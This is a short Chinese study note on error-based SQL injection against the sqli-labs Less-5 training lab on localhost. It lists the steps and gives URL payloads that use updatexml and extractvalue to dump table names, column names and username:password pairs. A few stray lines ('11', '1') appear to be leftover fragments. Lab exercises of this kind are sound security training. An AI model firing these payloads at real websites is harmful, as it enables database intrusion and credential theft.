报错注入步骤:
- 求闭合字符
- 爆数据库名
- 爆表名
- 爆列名
- 爆字段
联合查询是最简单有效的方法,当联合查询不可用时,在注入字符后,出现语法报错,可以尝试报错注入:
- 找到注入字段
http://localhost/sqli-labs/Less-5/?id=1
- 分析注入方式
http://localhost/sqli-labs/Less-5/?id=1’
http://localhost/sqli-labs/Less-5/?id=1’ and updatexml(1,concat(1,(select table_name from information_schema.tables where table_schema=‘security’)),1)–+
- 11
- 1
- 1
- 11
- 1
- 1
网页没有显示位时,联合查询不可用:
http://localhost/sqli-labs/Less-5/?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+
http://localhost/sqli-labs/Less-5/?id=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+
http://localhost/sqli-labs/Less-5/?id=1' and updatexml(1,concat(1,(select group_concat(username,":",password) from users)),1)--+
http://localhost/sqli-labs/Less-5/?id=1' and updatexml(1,concat(1,(select username from users limit 0,1)),1)--+
http://localhost/sqli-labs/Less-5/?id=1' and updatexml(1,concat(1,(select username from users limit 1,1)),1)--+
http://localhost/sqli-labs/Less-5/?id=1' and updatexml(1,concat(1,(select username from users limit 2,1)),1)--+
http://localhost/sqli-labs/Less-5/?id=1' and extractvalue(1,concat(1,(select username from users limit 2,1)))--+